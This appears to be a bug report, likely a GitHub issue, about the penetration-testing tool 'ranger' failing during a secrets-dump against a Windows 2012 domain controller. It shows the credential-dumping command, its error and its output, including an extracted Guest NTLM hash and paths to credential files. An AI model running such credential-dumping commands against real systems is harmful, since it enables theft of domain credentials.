
Windows 2012 as domain controller issue

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Have you tried to run ranger against a windows 2012 domain controller?

I got an error like this,

[!] An error occurred recording the hash (Unknown User):xxxx from secrets-dump: 'NoneType' object has no attribute 'split'

The command I used,

ranger -u Administrator -p xxxx -d -t --secrets-dump
# ranger -u Administrator -p xxxx -d -t --secrets-dump
[*] Attempting to access the system with, user: Administrator pwd: xxxx domain: at: 2016-10-13-12:47:04
 0000   01 00 00 00 35 B8 12 5E  85 59 5B 14 C5 8B 87 38   ....5..^.Y[....8
 0010   87 63 45 D6 CB F6 33 F9  78 4B 1B 3D 07 A7 0F 92   .cE...3.xK.=....
 0020   4D 5B 28 EA DF 93 36 64  7D 31 2D 9F               M[(...6d}1-.
 0000   A9 33 79 02 EE A1 7F 12  07 4D 8A 07 5D 5B 7C 3F   .3y......M..][|?
 0010   2C 1C A3 36 08 D2 83 2B  F4 52 BC 5B 74 1E E5 45   ,..6...+.R.[t..E
 0020   5D DF 80 9A 2E FE F3 92  58 16 4B 9A 73 FD 8E 60   ].......X.K.s..`
 0030   D6 EC 94 38 CC 42 50 34  00 32 2D 77 85 62 A6 85   ...8.BP4.2-w.b..
[*] Cleaning up...
[*] [!] An error occurred recording the hash (Unknown User):xxxx from secrets-dump: 'NoneType' object has no attribute 'split'
[*] [*] Wrote results to the following location /opt/ranger/results/secrets_dump/secrets_dump_172.16.177.130
[*] [+] workgroup\guest has access to system
[*] [+][+] Extracted the following hash Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] Wrote the saved credential matrix to: /opt/ranger/results/credentials/credential_matrix
[+] Wrote the remaining targets to the following file: /opt/ranger/log/remaining_targets.log
[+] Wrote the cleartext credentials to the following file: /opt/ranger/results/credentials/cleartext
[+] Wrote the pwdump credentials to the following file: /opt/ranger/results/credentials/pwdump
[+] Wrote the IP to account access mapping to the following file: /opt/ranger/results/credentials/access_to
[+] Wrote the current user's session locations to the following file: /opt/ranger/results/credentials/logged_in_to